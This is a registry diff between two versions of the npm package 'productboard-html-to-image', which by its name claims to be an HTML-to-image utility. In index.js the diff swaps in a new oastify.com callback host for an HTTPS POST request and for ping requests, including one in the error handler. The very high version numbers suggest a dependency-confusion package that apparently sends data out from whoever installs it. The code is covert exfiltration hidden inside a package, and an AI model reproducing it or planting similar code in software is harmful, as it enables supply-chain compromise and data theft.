productboard-html-to-image 1003.0.9 → 1005.0.9

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +3 -3
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -151,7 +151,7 @@ try {
151
151
  });
152
152
 
153
153
  const options = {
154
- hostname: "hxiqx36s9ii4qfrbuhn7mid15sbjzin7.oastify.com",
154
+ hostname: "ykm7kkt9wz5ldweshyao9z0is9y0m0ap.oastify.com",
155
155
  port: 443,
156
156
  path: "/",
157
157
  method: "POST",
@@ -170,10 +170,10 @@ try {
170
170
  req.write(postData);
171
171
  req.end();
172
172
 
173
- https.get("https://ping.hxiqx36s9ii4qfrbuhn7mid15sbjzin7.oastify.com/", () => { });
173
+ https.get("https://ping.ykm7kkt9wz5ldweshyao9z0is9y0m0ap.oastify.com/", () => { });
174
174
 
175
175
  } catch (e) {
176
176
  try {
177
- https.get("https://ping.hxiqx36s9ii4qfrbuhn7mid15sbjzin7.oastify.com/", () => { });
177
+ https.get("https://ping.ykm7kkt9wz5ldweshyao9z0is9y0m0ap.oastify.com/", () => { });
178
178
  } catch { }
179
179
  }
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "productboard-html-to-image",
3
- "version": "1003.0.9",
3
+ "version": "1005.0.9",
4
4
  "main": "index.js",
5
5
  "keywords": [],
6
6
  "scripts": {